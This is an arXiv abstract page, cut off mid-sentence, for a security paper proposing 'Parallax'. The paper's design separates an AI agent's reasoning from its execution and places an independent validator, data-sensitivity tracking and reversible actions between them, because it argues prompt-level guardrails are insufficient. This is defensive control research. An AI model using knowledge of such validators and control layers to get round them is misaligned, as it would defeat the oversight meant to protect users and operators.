[2604.12986] Parallax: Why AI Agents That Think Must Never Act
About this article
Abstract page for arXiv paper 2604.12986: Parallax: Why AI Agents That Think Must Never Act
Computer Science > Cryptography and Security arXiv:2604.12986 (cs) [Submitted on 14 Apr 2026] Title:Parallax: Why AI Agents That Think Must Never Act Authors:Joel Fokou View a PDF of the paper titled Parallax: Why AI Agents That Think Must Never Act, by Joel Fokou View PDF HTML (experimental) Abstract:Autonomous AI agents are rapidly transitioning from experimental tools to operational infrastructure, with projections that 80% of enterprise applications will embed AI copilots by the end of 2026. As agents gain the ability to execute real-world actions (reading files, running commands, making network requests, modifying databases), a fundamental security gap has emerged. The dominant approach to agent safety relies on prompt-level guardrails: natural language instructions that operate at the same abstraction level as the threats they attempt to mitigate. This paper argues that prompt-based safety is architecturally insufficient for agents with execution capability and introduces Parallax, a paradigm for safe autonomous AI execution grounded in four principles: Cognitive-Executive Separation, which structurally prevents the reasoning system from executing actions; Adversarial Validation with Graduated Determinism, which interposes an independent, multi-tiered validator between reasoning and execution; Information Flow Control, which propagates data sensitivity labels through agent workflows to detect context-dependent threats; and Reversible Execution, which captures pre-des...